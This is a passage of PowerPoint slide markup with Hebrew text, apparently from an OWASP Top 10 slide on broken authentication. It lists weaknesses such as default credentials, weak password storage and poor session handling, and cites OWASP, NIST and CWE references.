              </a:rPr>
              <a:t> או </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“admin/admin”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>שימוש בנתוני הזדהות חלשים או בלתי-אפקטיביים לצורכי תהליכי שחזור סיסמאות, כגון "תשובות ממאגר נתונים", אשר בהגדרה לא ניתן להגן עליהם.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>אחסון סיסמאות בצורה גלויה, מוצפנת או שימוש ב-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> חלש (למידע נוסף ראה: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>חשיפת מידע רגיש</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>חוסר שימוש או שימוש במנגנון </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>multi-factor authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> לא אפקטיבי.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>מזהי שיחה (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Session Ids</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>) חשופים ברמת ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>URL rewrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>אי-החלפת מזהי שיחה (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Session Ids</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>) לאחר הזדהות מוצלחת.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>אי-ביטול מזהי שיחה (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Session Ids</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>). מזהה משתמש או </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>authentication tokens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> (לרוב ביישום </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>single sign-on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>) לא מבוטלים בתהליך הניתוק או לאחר פרק זמן של אי-שימוש.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715" y="6356305"/>
            <a:ext cx="3383280" cy="2761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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הפניות</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls: Implement Identity and Authentication Controls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP ASVS: V2 Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>V3 Session Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Identity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Credential Stuffing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>Cheat Sheet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>Forgot Password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Session Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:hlinkClick r:id="rId16"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>OWASP Automated Threats Handbook</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:hlinkClick r:id="rId16"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הפניות חיצוניות</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>NIST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>800-63b: 5.1.1 Memorized Secrets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>CWE-287: Improper Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>CWE-384: Session Fixation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
